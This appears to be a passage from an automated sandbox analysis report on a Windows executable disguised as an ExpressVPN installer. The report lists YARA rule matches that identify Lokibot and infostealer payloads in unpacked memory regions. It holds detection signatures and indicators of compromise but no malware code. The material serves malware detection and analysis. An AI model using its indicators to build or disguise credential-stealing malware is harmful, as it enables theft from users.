Source: Mcx2Xk0fqn.exe, 00000000.00000002.1655167810.0000000004D76000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamestub.exe4 vs Mcx2Xk0fqn.exe
Source: Mcx2Xk0fqn.exe, 00000000.00000000.1641126833.000000000049C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameExpressVpn.exe6 vs Mcx2Xk0fqn.exe
Source: Mcx2Xk0fqn.exe, 00000000.00000002.1654908929.0000000003BD4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamestub.exe4 vs Mcx2Xk0fqn.exe
Source: Mcx2Xk0fqn.exe	Binary or memory string: OriginalFilenameExpressVpn.exe6 vs Mcx2Xk0fqn.exe

Source: Mcx2Xk0fqn.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Mcx2Xk0fqn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
